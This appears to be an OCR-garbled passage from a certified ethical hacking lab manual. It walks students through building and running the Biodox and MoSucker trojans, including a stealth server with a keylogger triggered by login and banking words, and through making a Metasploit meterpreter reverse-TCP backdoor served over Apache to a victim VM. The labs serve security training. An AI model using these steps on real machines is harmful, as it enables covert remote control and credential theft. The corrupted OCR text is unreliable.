
£3 commun A passwor manage keyboar msn sett

O g settings________0 system information (51; fin manager y commands f1 capture

server properties local tools

|w contact us

PoetCorrectionf f Cermet tkn 6661g Transfer 6662Bs<r#*n 66635 WebCam 6664

User Name Computer... Admin

Coded By Who! | who@ tikkysoft.comS ta tu s : R eady... ----- --FIGURE 9.3: Windows 8-Biodox main window language selection

5. Now click die Server Editor button to build a server as shown 111 die following screenshot.


| Test Message |

-Fake Error Message ־ -----. □Msg Title ;

Message : |biodox w a s here

: Message Icon

Error*

© צג

□ 0 0IP /[* S -Adress:

Connection; |6661 | Saeen Capture; |6663 |

Transfer: |666? | webcam Capture: |6664 |

r Victim Na Name:

0 Sy8tem32O Windowo O Temp

Connection Delay ־c#<־. for ronn^ftioi

־] connectionQUvf l

sO Yardyrr Moou

Server Mode־ (•> Gizli Mod

-Regetry Sertnqs ־ K*y: mssrs:

3 commenfcaton £ passwords ־־־

manage files keyboard נ

3P msnsetbnos $ settings manage' O systenr nfb־matDnfu יוד i manaoergp> commands \J capture 5j server propprtiet

local tools M contact us

PxtCorrection*3 Connection 6561S Transfer 6562?? Saeen 65635 WebCam 6564

Admin | Opera tin... | Cpu | Ram Coen try

active / deactive statusStatus : Read/...


6. 111 Server Editor options, enter a victim ’s IP address in die IP/DNS field; 111this lab we are using Windows Server 2008 (10.0.0.13).





7. Leave die rest o f die settings at dieir defaultd; to build a server click die Create Server button.

Note: IP addresses may ditter 111 your classroom labs.Biodox Open Source Edition

Server Editor

------Msg Title : |ErfQH I

Message : |biodox was hereMessage Icon :

© צ!_

□ 0 0-IP/DfsS---Adress: 110.0.0 13|

Connection: [6661 | Screen Capture: [6663 |

Transfer: |6662 | webcam Capture: [6664 |

Name: |v־ictim

0 5ystem32O Windows O Temp

1- Connection Delay —

Dday|i0n ** C

O Yardyn־ MoCu 0■ Server Mode - © Gizii Mod

-Registry Settings־Key: mssrs32

Vakje: mssrs32.exe

J_U£J

| H 7

!13 commuucaton£ passwords

manage fileskeyboardmsn settingssettings maTage־

^ systerr 1nfo־matonti f ir managerjj1׳ commands

capture2j server propertiesf k>:al tools*׳■contact us (ץס'

Correction Port?5 Connection 6561® Transfer 6562?? Screen 6563S WebCam 6564

Vetim Wame IP Adress UserNarre Computer... Admin Operatin... Cpu Ram Couitry

create serverStatus : Read/...

FIGURE 9.5: Bodox Main Screen

Server.exe tile w ill be created 111 its default directory: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.

׳| | Home

Applicator Toots B io d o x

Share View Manage "S’ ©

5 0 - ♦g « Trcjans Types ► GUITrojons ► D-odox Trojcn ► Biodox v|C | | Scorch Biodox

-T Favorites J4 Language

E Desktop M P lj9 ״ t

4 Downloads BIOCOX Cb tdition.exe

‘k\l Recent places j p U i n w

MSCOMCTL.OCX

Libraries gM SW 1N S <X 0C X

0 Documents £ res.g1f

J'' Music p i / [ server.exe")

B Pictures ft 5ertingj.ini

0 Videos-

FIGURE 9.5: Bodox services

9. Now switch to W indows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan to m il die server.exe die.




’ r0)or» "ypea - GUI Trojon* - - n־odo<c Tro,0׳3 Biodox ■׳ i ־־ t t J i F - &

Pile edit /1eA׳ oote le־ p

Crg»m:e ~ \1ewfl » (__ opcri a

Ms.. I •II * I tnodfi«d I * I Typ*

I i Ptugns4 Ib1XO Or &4tor.ete p Leetre<£m 5c c׳*> t . .ocx

£MS\MNSCX.OOf

i serangs.r

Fa/orite Links1 Docuncnts ־

%1 Pictures R j Music

More »

i . ... .*jm-r.^ 3iodo!c Trojsn

J . Bkxlox

i t Language J4 Pogne

FIGURE 9.6: Bodox server.exe

10. Double-click server.exe 111 W indows Sender 2008 virtual macliine, and click Run 111 die Open File - Security Warning dialog box.

Open File - Security Warning ן

The publisher could not be verified. Are you sure you want to run this software?

Name: .. .pes\GUI Trojans'Biodox Tr0jatVf310d0x\server.exe Publisher: Unknown Publisher

T y p e : Application

From: Z:\CEHv8 Module 06Trojans and Backdoors \Trojan...

E

CancelRun

• This file does not have a valid digital signature that verifies its tgV publisher. You should only run software from publishers you trust.

How can I decide what software to run*

FIGURE 9.7: Run the tool

11. Now switch to W indows 8 Virtual M acliine and click die active/deactive status button to see die connected machines.




Biodox Open Source EditionServer Editor

כ

-Fake Error Message —-------־■ □Msg Tlllc ; |br-or

Message: [biodox w

Message Icon :

□ Q SAdress: 10.0.013

Connection: [6661 | Saeen Captjre : |6663 |

Transfer: |66s? | webcam Capture: |6664 |

- Vctim flame־ Name: Ivic

0 System32O Windows O Temp

connection Delay-1ee. זכי connectioi

r connection

D^ayjiO I

O Yardyrr Mocu

•server Mode-

© Gizli Mod

-Regetry Sewings- Key: mssrs:

rS commuiicaton passwords manage ftes

j keyboard fla msnsettjnos

settings ma-iage־׳ O system info-maoxi finmanaoer •.#־.׳jj׳ commands [_jj capture 3 server properties A loal tools “\) contact us

PxtConnectionS Connection 6561

Transfer 6962® Saeen 6563S WebCam 6564

Vctom Name IP Adress User Narre Cornputcr... Admin Operatin... Cpu Ram Country

active / deactive statusStatus : Settings saved and server created(

FIGURE 9.8: Bodox open source editior

12. After getting connected you can view connected victim s as shown 111 die following screenshot.


------Msg T itle : [Errofl |

Message : | biodox w a s here

Message Icon ;

Vצב ©

0 ם0Adress: 10.0.013

Connection: |6661 | Saeen Captjre: |6663 |

Transfer: [6662 | webcam Capture: |6€€4 |

---

- Install Path-------------------O Windowo O Temp

r Connection Delay — o«l»y|10 | fer ־

r Server Mode-O Yordyro Modu

Key: mssrs32

: mssrs32 e:

J/D

1 ® ש3 communicaton 2־'־ passwords

manage fles keyboard msn settinos settings maTage־׳

Q system information fin manager ׳$•§> commands

| j | capture ijj server prop»rt1»c local tools ־־}) contact us

:onrertcnS Connection 6561 IS Transfer 6562לי Saeen 6563S WebCam 6564

. IP Adress_____ UsstNatifi___ CaniButfir...__ Admin_____ Qpsratin...__ CpuWin Vista 3D93 0.99 GB United.Adrrinistr... WIN -EGB..

Status : d ien t Active

FIGURE 9.9: Bodox open source editior

13. Now you can perform actions with die victim by selecting die appropriate action tab in die left pane o f die Biodox window.

14. Now click the settings manager option to view the applications running and odier application settings.





Name PID Path Memory ... Priority a 0S I (system pr... 0 System 0H*J cytttm

23smss.exe4

432

SyetamSystem

0929792 Normal H

BH3 csrss.exe 500 System 5701632 Normalcsrss.exe 544 System 7430144 Normal

H•!! wmm1t.e>e 552 System 4849664 HiobL.-J ׳.unlogon exe 580 System 6287360 High 0servces.exe 628 System 7188480 NormalIQ kass.exe 640 System 10821632 Normal ן--------15llsm .exe 648 System 4812800 Normal

svd־ost.exe 836 System 6418432 Normal □svd־ost.exe 896 System 7192576 Normalsvehost.exe 992 System 9965568 Normal

ii j l svchost.exe 1015 System 7016448 Normal 1*1svd-ost.exe 244 System 33181695 NormaliiJdsvc.exe 296 System 12562432 Normal svcfost.exeוזיו 360 System 12091392 Normal v

@ 01rS commuiicatonA passwords

msnags fles j keyboard

fla msnsettmas 9 settings maTagy

1 apjlicatons ~| 1A ao^icaton setbnos £ ex3lore׳ setings C3 pmt ^ services

0 system information fun manager •$.׳jj1׳ commands ^ capture j server properoe;A local tools W) contact us

PxtConnection5 Connection 6561

Transfer 6962® Screen 6563® WebCam 6564

? Adress User Narre Computer... Admin Operatin... Cpu0.99 GB United...Admmstr... WIN-EGB... True

Clear Application ListStatus : successfully

FIGURE 9.9: Boclox open source editor

15. You can also record die screenshots o f die victim by clicking die Screen Capture button.

16. Click die Start Screen Capture button to capture screenshots o f die victim ’s machine.

FIGURE 9.10: screen capmre

17. Biodox displays the captured screenshot o f the victim ’s machine.




V 41 * * ** VסRctydean

&

Saeen Capture x

a 9

S L

BNr* Te*t

Doa1H0w.txT

FIGURE 9.11: screen capture

18. Sim ilarly, you can access die details o f die victim ’s machine by clicking die respective functions.

L a b A n a ly s is

Analyze and document die results related to die lab exercise. G ive your opinion on your target’s security posmre and exposure dirough public and tree information.



Biodox O utput:Record the screenshots o f the victim machine

In tern et C onnection Requ ired

□ Yes 0 N o

Platfo rm Supported

0 C lassroom 0 !Labs

C E H Lab M anual Page 505 Eth ica l H acking and Countenneasures Copyright © by EC-CouncilAH Rights Reserved. Reproduction is Stricdy Prohibited.


C r e a t i n g a S e r v e r U s i n g t h e

M o S u c k e r

M o S u c k e r is a V is u a l B a s ic T ro ja n . A lo S u k e r's e d it s e rv e r p ro g ram h a s a c lie n t

w ith th e sam e la y o u t a s su b S e ve n 's c lie n t.


A backdoor is a secret or unauthorized channel for accessing computer system. 111 an attack scenario, hackers install backdoors on a machine, once compromised, to access it 111 an easier manner at later times. W ith the growing use o f e-commerce, web applications have become the target o f choice for attackers. W ith a backdoor, an attacker can virtually have fu ll and undetected access to your application for a long time. It is critical to understand the ways backdoors can be installed and to take required preventive steps.

You are a security adm inistrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft ot valuable data trom the network, and identity thett.


The objective o f this lab is to help students learn to detect Trojan and backdoor attacks.


■ Creating a server and testing the network for attack

■ Detecting Trojans and backdoors



To carry tins out, you need:

■ M oSucker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\M oSucker

A י computer running Windows Server 2012 as host machine

I CON KEY

[£Z7 V a lu a b lein fo rm a tio n ________

.y v T e s t v o u rk n o w led g e_________

* * W e b ex erc ise

־> r • . W o rk b o o k re v ie w

IT Tools demonstrated in this lab are availab le in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors




■ A computer rumiing Window Server 8 VirU ial Machine (Attacker)

■ Windows Server 2008 running 111 Virtual Machine (Victim )


■ Adm inistrative privileges to run tools


Time: 20 Minutes


A Trojan is a program that contains m alicious or harmful code inside apparendy harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die hie allocation table on a hard drive.

Note: The versions o f die created client or host and appearance o f die website may differ from what it is in die lab, but die actual process o f creating die server and die client is same as shown 111 diis lab.

L a b T a s k s

3 t a s k 1 1. Launch W indows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06_ Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker.C re a te S e rv e r

with ProRat 2. Double-click die CreateServer.exe hie to create a server.F - p i ־ ׳

| Home Sh

Applicator Tools M o S u ck er

View Manage ש ©

* _ “Trcjans Types ► GUI Trojans ► MoSuckcr V | <צ | | Search MoSuckcr fi |

Favorites ׳>-■ Desktop f t Downloads

'2Al Recent place}

04 LibrariesQ Documents ^ Music M Pictures

J ! AY Firewall e/entsJ tc g i

Jl. pi jg nsj . runtimK

J l screenshots J i slons j . stub

| ^ Crea:eServer.exe | MoSjckerexe

Q j Vid»oc j_] ReadMe.txt

lOiterrc 1 it*m cel»rt#d 456 K2

FIGURE 10.1: Install createServer.exe

3. 111 the Open File - Security Warning dialog box, click Run.




Open File ־ Security Warning


Name: ...Trojans Types\GUI Trojans\MoSucker\CreateServer.exe Publisher Unknow n Publisher

Type: ApplicationFrom: Z:\CEHv8 Module 06 Trojans and BackdoorsVTrojans T...

S 3

CancelRun


FIGURE 10.2: Install createServex.exe

4. The MoSncker Server Creator/Editor window appears, leave die default settings and click OK.

m

MoSucker 3.0Server Creator/EditorCoded by Superchachi. Contains code from Mosucker 2.2 by Krusty Compiled for Public release B on November 20/2002, VB6

(• I w ant to c reate a stealth trojan server for a victim

I- Indude Msvbvm60.dll in your MoSucker server (adds 750 KB) CD17 Indude mswinsock.ocx in your server (adds 50 KB) Recommended! CD17 Pack for minimal file size CD

ש

ש

MoSudcer Transport Cipher Key TWQPQJL25873IVFCSJQK13761

V Add | 2385 KB to the server.

( I want to c reate a visible server for local testing.I w ant to edit an existing server

17 Start configuration after creating the server

OkCancelAbout

FIGURE 10.3: Install createServer.exe

5. Use die file name server.exe and to save it 111 die same directory, click Save.

£ / Tools dem onstrated in this lab are availab le in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors




MoSucker Server Creator.

Search MoSucker

&© 0 ^ [ « GUI Trojans ► MoSucker

Organize w New folder

Type

File foldeJ

File foldeJ

File foldeJ

File foldeJ

File foldeJ

File foldeJ

File foldeJ

ApplicatiaApphcatio

Date modified

9/19/2012 1:37 PM

9/19/20121:37 PM

9/19/2012 1:37 PM

9/19/20121:37 PM

10/1/2012 6:56 PM

9/19/2012 1:37 PM

10/1/2012 6:50 PM

11/28/2002 2:59 A M

11/22/2002 5:10 PM

Nam e

i . AV Firewall events

X cgi J plugins

X runtimes

J . screenshots

X- skins

J stub

Jp CreateServer.exe

jg | M 0 Sucker.exe

0 Documents * J 1 Music

Pictures

8 Videos

Homegroup

: ■ Computer

^ Local Disk (C )

V CEH-Tools ( \\1 0 .

^ Network

File QameJ 5

Save as ty p e Executable Files (*.exe)

Save Cancel“■ Hide Folders

FIGURE 10.4: Save Server.exe

6. MoSucker w ill generate a server w ith the complete settings in die default directory.

MoSucker 3.0

Generating server...100% complete

Build D ate: 11/28/2002 2:04:12 AMBuild Info: MoSucker 3.0 Public Release B

Level Accessed: Public UPXVerifying n e c e s s a ry filep a th s P rep arin g f ir s t s tu b P rep arin g sec o n d s tu b Packing f irs t s tu b Packing sec o n d s tu b Modifying file h e a d e rs

FIGURE 10.5: Install server progress

7. Click OK 111 die Edit Server pop-up message.

Edit Server 3.0

Server created successfully! Server size: 158 KB.Do not repack server.

OK

FIGURE 10.6: Server created successful

111 the MoSucker wizard, change die VictinVs Name to Victim or leave all the settings as dieir defaults.



Module 06 - Trojans and Backdoors

MoSucker 3.0

Selected Server: |2:VCEHv8 Modde 06 Trojans and Backdoors\Trojans Type [ Close

0שש

0שש

Server ID: 1501704QWEYJC: 4264200TPGNDEVC

Cypher Key: TWQPOJL25873IVFCSJQK13761

Victim's Name: |vict!m ~ ]

Server Name(s): kernel32,mscOnfig,winexec32,netconfig״

Extension^): exe,pif,bat,dliope,com,bpq,xtr,txp,

Conrectior-eort: 142381

I * Prevent same server multi-infections (recommended)

You may select a windows icon to associate with your custom file extension/s.

NameA’ortPassword

[ Notificabon 1

f Notification 2

Options

J<gyjg99g-Fake Error

Rle Properties

SaveRead

FIGURE 10.7: Give die victim machine details

9. N o w click Keylogger 111 die le ft pane, and check die Enable off-line keylogger option, and dien click Save.

10. Leave die rest o f die settings as dieir defaults.

MoSucker 3.0

Selected Server: |z:\CEHv8 Module 06 Trojans and Backdoors \Trojans Type [ C ~ \ Close

P I !Enable off-line keyioggetj [T]

Log Filename:

monitor.logש

־1ש Enable Smart LoggingCaptwn key words to trigger keylogger (separate each with a comma)

ho tmad,yahoo',login׳password,bankfsecurefcheckoutfregister,

Name/Port

Password

Options

KeyloggerPlug-ns <11Fake Error

Fde Properties

SaveRead

FIGURE 10.8: Enable the keylogger

11. C lick OK 111 die EditServer pop-up message.

MoSucker EditServer 3.0

Server saved successfully. Final server size: 158 KBo

OK

FIGURE 10.9: Server save file

Ethical Hacking and Countenneasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.

CEH Lab Manual Page 510


12. N o w switch to W indows Server 2008 V irtua l Macliine, and navigate to Z:\CEHv8 Module 06 Trojans and BackdoorsVTrojans Types\GUI Trojans\M oSucker to run die server.exe tile.

3 2 ^ -Jpj *1

©Si H I

■»-» - H I- ־■■°■i AVFrmsI e\en3I i*co

| 4. a־e v 1•.1—* viSvcce'.sxe

Pit Edl Vtew ~odi •tep* Virnt *

favorite Links

£ Pitres 1• Ml*

l__ ^ _________________________IFIGURE 10.10: click server.exe

13. Double-click server.exe 111 W indows Server 2008 virtual macliine, and click Run 111 die Open File - S ecurity W arning dialog box.

x 11Open File - Security Warning


Name: .. .s\T1rojans Types\GUI TrojansV'loSucker'!server.exe

Publisher: Unknown PublisherType: Application

From: Z : \CEHv8 Module 06 Trojans and Backdoors\T1ro jan ...

CancelRun

ן . This file does not have a valid digital signature that verifies its f! publisher. You should only run software from publishers you trust.

How can I decide what software to run ל

FIGURE 10.11: Click on Run

14. N o w switch to W indows 8 V irtual Macliine and navigate to Z:\CEHv8 Module 06 Trojans and BackdoorsVTrojans Types\GUI Trojans\MoSucker to launch MoSucker.exe.

15. Double-cl1ckM oSucker.exe.

Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.



K W ־״11 1 Ibmc Share

-pp11:ator took M o Su ck er

View׳ Manage <K> «* «i־*) ♦1)©] t״*jnj Types ► GUI Trojans ► MoSucker v C | Scorch MoSuckcr f i |

-{ Favorite AY F rewa 1 e/ents - J! 5erver.exe

K Desktop M c9

6 Downloads J p ljg ns

ffil Rccent plates 1 runtime

£ saeensnocs

^gi Libraries ^ slons

H] Documents stub

Music $ C rea:eServer.exe

[K J Pictures ^ M o S u d e m e ]

!HI Videos j | ReadMe.txt

11 items 1 item selerted 3.08 MB £ 5 ,

FIGURE 10.12: dick on Mosuker.exe

16. 111 the Open File — Security W arning dialog box, click Run to launch MoSucker.



Name: ...rsVTrojans Types\GUI Trojans\MoSucker\MoSucker.exe

Publisher Unknown Publisher Type: Application

From: Z:\CEHv8 Module 06 Trojans and BackdoorsVTrojans T...

S3

CancelRun


FIGURE 10.13: Run die applicatin

17. The MoSucker main w indow appears, as shown 111 die fo llow ing figure.

10.0.012 ][10005

JMisc stuff

Infotmation File related

System Spy related Fun stuff I Fun stuff II

Live capture

u i i u u i . m o s u c h c r . t K

* 0G

FIGURE 10.14: Mosucher main window




18. Enter tlie IP address o f die v ic tim and port number as you noted at die time o f server configuration, and dien click Connect.

19. 111 tliis lab, we have noted W indows Server 2008 virtual machine’s IP address (10.0.0.13) and port number: 4288.

Note: These m ight d iffer 111 your classroom labs.

FIGURE 10.15: connect to victim machine

20. N o w die Connect button automatically turns to D isconnect after getting connected w id i die v ic tim machine as shown 111 the fo llow ing screenshot.

version 3.0

FIGURE 10.16: connection established

21. N o w click Misc s tu ff 111 die le ft pane, which shows different options from which an attacker can use to perform actions from liis or her system.




| _ About׳'

FIGURE 10.17: setting server options

22. Y ou can also access the v ic tim ’s machine remotely by clicking Live capture 111 the le ft pane.

23. 111 the Live capture option click Start, w hich w ill open the remote desktop o f a v ic tim ’s machine.

A׳ bou t' _ ~x]

| 4288 11 Disconnect 11 Options ] sg JI& Q

make screenshot

Make screenshot

JPEG Quality: * 20%• 30%• 40%• 50%• 60%• 70%• 80%O 90%

Misc stuff Information File related

System Spy related Fun stuff I Fun stuff II

Live captureStart

Settings

& oi£

FIGURE 10.18: start capturing

24. The remote desktop connection o l die v ic tim ’s machine is shown 111 die fo llow ing tigiire.

Ethical Hacking and Countemieasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Stricdy Prohibited.

I& Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors



Remote administration mode

sssei sssa&i

U

RA mode optionsResi2e windo-v to 4:3

JPG Quality 1 ' ▼

Delay in ms | 1000

W Send mouseclicks W Send pressed keys

Send mousemoves W Autollpdate pics V Fullscreen

FIGURE 10.19: capturing victim machine

25. Y ou can access tiles, m odify die files, and so on in dns mode.

w Rem10te administration mode *

r\ *>I

j1

!

^ :Tnt-.aocw ____

E1K «־ Cfc■־*־

& Z Z

Crcre:5FHB

-----

► * ־■*oי־יי® 1 • M

1 o ;

RA mode optionsResize window to 4:31

JPG Quality 190% ▼ j

Delay in ms | 1000

W Send mouseclcks W Send pressed Leys 1“ Send mDusemoves W Autollpdate pics

Fullscrccp

J

FIGURE 10.20: capturing victim machine

26. Similarly, you can access die details o f die v ic tim ’s machine by clicking die respective functions.

L a b A n a ly s is

Analyze and document die results related to die lab exercise. Give your opinion on your target’s security״ postare and exposure through public and free information.




PLEASE T A L K TO YOUR IN S T R U C T O R IF YOU H A V E Q U E S T IO N S R E LA T E D TO T H IS LA B .

T o o l /U t i l i t y In fo rm a tio n C o lle c te d /O b je c tiv e s A ch ie ve d

M o s u c k e r O u tp u t:

Record the screenshots o f the v ic tim ’s machine

Q u e s t io n s1. Evaluate and examine various methods to connect to victims i f they are 111

different cities or countries.

□ Yes 0 N o

P la tfo rm S upported

0 C lassroom 0 !Labs




H a c k W i n d o w s 7 U s i n g M e t a s p l o i tM etasploit Fra wen ork is a toolfor developing and executing exploit code against a remote target machine.


Large companies are com m on targets fo r hackers and attackers o f various kinds and i t is no t uncom m on fo r these companies to be actively m on ito ring tra ffic to and from their critica l IT in frastructure. Based 011 the functiona lity o f the T ro jan we can safely surmise that the in ten t o f the T ro jan is to open a backdoor 011 a com prom ised computer, a llow ing a remote attacker to m on ito r activ ity and steal in fo rm a tion fro m the com prom ised com puter. Once installed inside a corporate netw ork, the backdoor feature o f the T ro jan can also allow the attacker to use the in itia lly com prom ised com puter as a springboard to launch fu rther forays in to the rest o f the in frastructure, meaning that the wealth o f in fo rm a tion that may be stolen could potentia lly be far greater than that existing 011 a single machine. A basic princ ip le w ith all malicious programs is that they need user support to do the damage to a com puter. That is the reason w hy T ro jan horses try to deceive users by showing them some other fo rm o f email. Backdoor programs are used to gam unauthorized access to systems and backdoor software is used by hackers to gain access to systems so that they can send 111 the malicious software to that particular system. Successful attacks by the hacker 01־ attacker in fecting the target environm ent w ith a customized T ro jan horse (backdoor) determines exploitable holes 111 the current security system.

Y ou are a security adm inistrator o f your company, and your job responsibilities include pro tecting the netw ork fro m Trojans and backdoors, T ro jan attacks, th e ft o f valuable data from the network, and iden tity theft.


The objective o f tins lab is to help students learn to detect T ro jan and backdoor attacks.


■ Creating a server and testing the netw ork fo r attack

I CON KEY

[Z 7 Valuable ____information

Test your * .׳י_____knowledge*e W eb exercise

£Q Workbook review

& Tools dem onstrated in th is lab are available in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors




■ A ttack ing a ne tw ork using sample backdoor and m on ito r the system activ ity


T o cany tins out, you need:

■ A computer running W indow Server 2012

י B acktrack 5 r3 running in V irtua l m achine

■ W indows7 running 111 virtual machine (V ictim machine)


■ Administrative privileges to nan tools


Time: 20 Minutes


A Trojan is a program that contains m a lic ious or harm ful code inside apparently harmless programming or data 111 such a way that it can ge t co n tro l and cause damage, such as ru in ing die hie allocation table on a hard drive.

L a b T a s k s

s d T A S K 1

Create Sever Connection

1. Start B ackT rack 5 virU ia l machine.

2. O pen the term inal console by navigating to A p p lica tio n ^ B ackT rack ־־ E xp lo ita tio n Too ls ־־ N e tw o rk E xp lo ita tio n Too ls ־־ M e tasp lo it F ram ew ork ־־ m sfconso le

d L IUC Oct 2310:03 ״ AM,y Applications Places System |

Accessories ►

^ Backltack

, f Graphic*

Oathefing >*! ׳ :

► Vulnerability Assessment

Internet ► ■0 Exploitation Ibols ► . K Network Exploitation Tbols ► Cisco Attacks .!< ־׳

i l l Office ► ^ Pnvilege Escalation Exploitation Tools <§>/ ״ ► .1 . Fast-"H־ack ►

^ Other ► B \ Maintaining Access » ^ Database Expl• ^ armitage i H Metasploit Framework ►

Sound & Video ״!^ ► Reverse Engineenng » Wireless Explo ^ msfdi if-. SAP Exploitation »

f l f System Tools ► ^ RFID Tools ► 9 Social Engmee ^ msfconsole ^ isr-evilgrade

5 Wine ► a Stress Testing ^ Physical Explo ־״ msfupdate netoear-telnetenable

r f - Forensics ► Open Source E 3b. start msfpro termineter

^ Reporting ToolsV

j P Services

? Miscellaneous * m _ י , כ ׳—א

back track< <

[Create Simple Exploit...

Open your terminal (CTRL + ALT +1) 311d type msfvenom -h to view the available options for diis tooL

CEH Lab Manual Page 518 Ethical Hacking and Countenneasures Copyright © by EC-CouncilAH Rights Reserved. Reproduction is Stricdy Prohibited.


FIGURE 11.1: Selecting msfconsole from metasploit Framework3. Type the fo llow ing com mand 111 msfconsole: m sfpayload

w indow s/m e te rp re te r/reve rse tcp LHOST=10.0.0.6 X > D esktop/B ackdoor.exe and press Enter

Note: Th is IP address (10.0.0.6) is BackTrack machines. These IP addresses may vary in your lab environm ent.

I IBackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection

Cj 152 TUe0Ct23. 3:32 PM

File Action Media Clipboard View Help

« 3 ® S 0 II 1► fe 1Applications Places system ם

I File Edit View Terminal Help

3K0a SuperHack I I Logon

x r a c K» [ m etasp lo it v4 .5 .0 dev [c o re :4 b ap i: 1.0] y

״=[ 927 - e x p lo its • 499 a u x il ia r y - 151 post־־=[ 251 - payloads • 28 encoders - 8 nops

; > jnsfpayload w indows/neterpreter/reverse tcp LHOST-1O.0.0.6 X > Desktop/Backdoor

FIGURE 11.2: CreatingBackdoor.exe

4. T ins com m and w ill create a W indows e xecu tab le f i le w ith name the Backdoor.exe and i t w ill be saved on the BackTrack 5 desktop.

ד׳---------------J File Action Media Clipboard V!*w H«lp

it fe !ן ■it 0 ® @ g^ Applications Places System

ABackdoor.exe

BackTrack on W1N-D39MRSHL9E4 - Virtual Machine Connection

U 1ue OCt 23. 11:53 AM

<< back I track

ja a j,Vi

FIGURE 11.3: Created Backdoor.exe file

5. N o w you need to share B ackdoor.exe w ith your v ic tim machine (W indows 7), by fo llow ing these steps:


Metasploit Framework, a tool for developing and executing exploit code against a remote target machine



6. O pen a new B ackT rack 5 term inal (CTRL+ALT+T) and then nan this com mand m kd ir /va r/w w w /share and press Enter to create a new director}״ share.

To create new directory share following command is usedmkdir /var/www/ share

FIGURE 11.4: sharing the file

7. Change the mode fo r the share fo lder to 755, by entering the comm and chm od -R 755 /var/w w w /share / and then press Enter

T=TB"■BackTrack on W1N-D39MRSHL9E4 - V irtual M achine Connection

d FT ■Rie Oct 23.12:03 Pf/


<910 (■) @ O II It fe ,Applications Places System □

. f tBackdoor.exe

׳י א <*• ro o t^ b t: —File Edit View Terminal Help1-. ra<d1r A /»>*</share

^oot$»i ־ -k chaod •R 755 /var/*ww/share/ |י I

<< back I track 5

״ a i

c a To change die mode ofshare folder use the following command:chmod -R * /var/www/ share/

FIGURE 11.5: sharing the file into 755

8. Change the ownership o f that fo lder in to www-data, by entering the com mand chow n -R w w w -da ta :w w w -da ta /var/w w w /share / and then press Enter.




BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection

d I 1ue oct 23. 12:0צ PM

Fil• Action Midi• Clipboard M w Hilp

It > ® @0 II It >»Applications Places system ( * ]

' v k r o o t ^ b t : ־־

ile Edit View Terminal Help*־:otgfet׳ nkd ir /var/www/share '2 i . l lL . . TT; i ■־■ ■ot'jbt:-♦ cnown •R www data :www data /var/wwv/stmrc/ \

back I track 5< <

FIGURE 11.6: Change the ownership of the folder

9. Type the com mand Is -la /va r/w w w / | grep share and then press Enter

'- BackTrack on W1N-D39MR5HL9E4 - Virtual Machine Connection*־׳°!

d [>-<: 1ue OCt 23 .1


•it 3 ® @ 0 II It &Applications Places system (>ך

׳ s v x r o o t ^ b t -

Tile Edit View Terminal Helproot^bt:-* n kd ir /var/ww/share rootgbt:-# chaod -R 755 /var/w w /share/'c -~ chowr -R w » data:wuw data /var/ww/stmre/roct^b t:-» I s - la /var/w w / | grep sh a re |

<< back I track 5

-03FIGURE 11.7: sharing die Backdoor.exe file

To change ownership of fo lder in to w w w , use th is command chown -R w w w - data/var/www/share/

10. The next step is to start the Apache se rve r by typ ing the se rv ice apache2 s ta rt com m and 111 the term inal, and then press Enter.





a I 1UC CCt 23. 12:07 PM

Fil• Action Midi* CI1pbo»rd V!** Htfp

It > ® @0 II 1► >»Applications Places system (י ]

י

י א ׳ ׳ י r o o t ^ b t : —

File Edit View TSfrminal Helprootjabt:־ # nkd ir /var/www/share rootjabt:-* ch«od -R 755 /var/w w /share/ rootgb t:'♦ chowr ■R vm data:www data /var/wwv/shar< rootgbt:-♦ I s - la /var/w w / | grep share drwxr-xr-x 2 www-data ww-data 4096 2012-10-23 12■A -pet :c l:-♦ se rv ice apache2 s ta r t |* S ta r t in g web serve r apache2

httpd (p id 3662) a lre ad y running

A

back I track £< <

-03.FIGURE 11.8: Starting Apache Webserver

11. N o w your Apache web server is running, copy the B ackdoor.exe tile in to the share folder. Type the fo llow ing com m and cp /roo t/D esktop /B ackdoor.exe /var/w w w /share / and press Enter

־ןד» ״ן BackTrack on W1N-D39MRSHL9E4 - Vח irtual Machine Connection


« I © ® © a 11 !»■ r» ,

ABackdoor.exe

x r ׳v ־״־ o o t 'J b t : ~

R le Edit View Terminal Helprootstot:-# nkd ir /var/ww/share root0b t :-41 chaod -R 755 /var/w w /share/ root§bt:~# chown r m/m data:wvw data /var/wwvr/shar•/-.^ rootpb t:*# I s - la /war/mm/ | grep share d rw xr-x rx 2 v/^v data ww#r data 4096 2612 JQ-21 n !n 1 utm ro o t0 b t:* f s e rv ic e apache2 s ta r t• S ta r t in g web server apache2

httpd (p ld 360?) a lre ad y running

rootflbt:-* cp/root/Desktop/Backdoor.exe /var/www/share/ L i J l : O ii : 111:1 1 ■■U, . ! : a l . tiu - u l : . f l . L LL i i i 11:1./cp /root/Pe>kt9p/Bdckdoor.exe /var/www/shdie י

<< back I track

יו1 Status: Running

FIGURE 11.9: Running Apache Webserver12. N o w go to W indow s 7 V irtua l Machine, open F ire lox o r any web

browser, and type the U R L h ttp ://1 0 .0 .0 .6/s h a re /111 the URL fie ld and then press Enter

Note: Here 10.0.0.6 is the IP address o f BackTrack; it may vary 111 your lab environm ent.

& T o run the apache web server use the fo llow ing command: cp/root/.msf4/data/ex p lo its /*/var/www/share/



http://10.0.0.6/share/111


י

te ׳־■ ' =°׳ *

D B»knw I

Windows 7 on W1N-D39MR5HL9E4 - Virtual M a r in e Connection

C GopfJe ־11*

Fil• Action Media Clipboard V!** Halp

0 Q n 1► ;fe >! )׳ 0 )יי»’ Indtx of /thaw

